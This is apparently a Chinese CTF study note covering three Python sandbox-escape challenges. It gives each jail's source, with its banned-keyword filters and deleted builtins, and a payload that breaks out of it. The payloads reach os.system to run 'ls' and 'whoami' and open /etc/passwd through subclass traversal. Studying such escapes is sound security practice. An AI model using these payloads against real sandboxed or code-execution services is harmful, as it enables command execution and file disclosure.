第一道
from __future__ import print_function
print("Welcome to my Python sandbox! Enter commands below!")
banned = [
"import",
"exec",
"eval",
"pickle",
"os",
"subprocess",
"kevin sucks",
"input",
"banned",
"cry sum more",
"sys"
]
targets =__builtins__.__dict__.keys()
targets.remove('raw_input')
targets.remove('print')
for x in targets:
del __builtins__.__dict__[x]
while 1:
print(">>>", end=' ')
data = raw_input()
for no in banned:
if no.lower() in data.lower():
print("Nobueno")
break
else: # this means nobreak
exec datapayload: ().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('ls')
第二道
#!/usr/bin/env python
from re import findall
def make_secure():
UNSAFE = ['open',
'file',
'execfile',
'compile',
'reload',
'__import__',
'eval',
'input']
for func in UNSAFE:
del __builtins__.__dict__[func]
# Remove dangerous builtins
make_secure()
print 'Go Ahead, Expoit me >;D'
while True:
try:
print ">>>",
# Read user input until the first whitespace character
inp = findall('\S+', raw_input())[0]
a = None
# Set a to the result from executing the user input
exec 'a=' + inp
print 'Return Value:', a
except Exception, e:
print 'Exception:', epayload:().class.bases[0].subclasses()[40]("/etc/passwd").read()
前两道环境是py2,第三道是py3
第三道
# -*-coding:utf-8-*-
#!/usr/bin/python3
import sys, cmd, os
del __builtins__.__dict__['__import__']
del __builtins__.__dict__['eval']
intro = """
pwnhub cuit
pwn everything
Rules:
-No import
-No ...
-No flag
"""
def execute(command):
exec(command, globals())
class Jail(cmd.Cmd):
prompt = '>>> '
filtered = '\'|.|input|if|else|eval|exit|import|quit|exec|code|const|vars|str|chr|ord|local|global|join|format|replace|translate|try|except|with|content|frame|back'.split('|')
def do_EOF(self, line):
sys.exit()
def emptyline(self):
return cmd.Cmd.emptyline(self)
def default(self, line):
sys.stdout.write('\x00')
def postcmd(self, stop, line):
if any(f in line for f in self.filtered):
print("You are a big hacker !!!")
print("Go away")
else:
try:
execute(line)
except NameError:
print("NameError: name '%s' is not defined" % line)
except Exception:
print("Error: %s" % line)
return cmd.Cmd.postcmd(self, stop, line)
if __name__ == "__main__":
try:
Jail().cmdloop(intro)
except KeyboardInterrupt:
print("\rSee you next time !")payload:print(getattr(os, "system")("whoami"))
等有空好好看看python面向对象的那一块知识
参考链接:
http://www.php.cn/python-tutorials-356723.html
http://blog.51cto.com/13620939/2075204
https://xz.aliyun.com/t/52#toc-0
http://www.k0rz3n.com/2018/05/04/Python%20%E6%B2%99%E7%9B%92%E9%80%83%E9%80%B8%E5%A4%87%E5%BF%98/
http://www.bendawang.site/2018/03/01/%E5%85%B3%E4%BA%8EPython-sec%E7%9A%84%E4%B8%80%E4%BA%9B%E6%80%BB%E7%BB%93/